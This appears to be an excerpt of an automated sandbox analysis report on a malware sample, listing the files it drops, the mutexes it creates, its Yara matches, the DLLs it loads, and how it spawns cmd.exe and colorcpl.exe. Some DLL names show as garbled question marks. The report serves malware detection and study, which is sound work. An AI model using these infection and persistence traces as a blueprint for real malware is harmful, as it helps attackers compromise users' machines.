              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4ABD8 CreateToolhelp32Snapshot,0_2_02B4ABD8
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B46D50 CoCreateInstance,0_2_02B46D50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A99493 FindResourceA,LoadResource,LockResource,SizeofResource,5_2_04A99493
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A98C2E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_04A98C2E
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeFile created: C:\Users\Public\WnbcdrjtF.cmdJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3756:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
              Source: C:\Windows\SysWOW64\colorcpl.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-L3FHGJ
              Source: Yara matchFile source: MeP66xi1AM.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.MeP66xi1AM.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.2176891397.000000007EBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.2113194413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\Public\Libraries\Wnbcdrjt.PIF, type: DROPPED
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: MeP66xi1AM.exeReversingLabs: Detection: 52%
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeFile read: C:\Users\user\Desktop\MeP66xi1AM.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\MeP66xi1AM.exe "C:\Users\user\Desktop\MeP66xi1AM.exe"
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: unknownProcess created: C:\Users\Public\Libraries\Wnbcdrjt.PIF "C:\Users\Public\Libraries\Wnbcdrjt.PIF"
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: url.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: winhttpcom.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??????????.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ???e???????????.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ???e???????????.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??????????.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: tquery.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: spp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: spp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: spp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppwmi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppcext.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: winscard.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sti.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: version.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: url.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: userenv.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: winmm.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: wininet.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: wldp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: profapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ??????????.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ????.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: tquery.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: cryptdll.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: spp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: spp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: spp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppwmi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: slc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppcext.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: winscard.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: devobj.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp
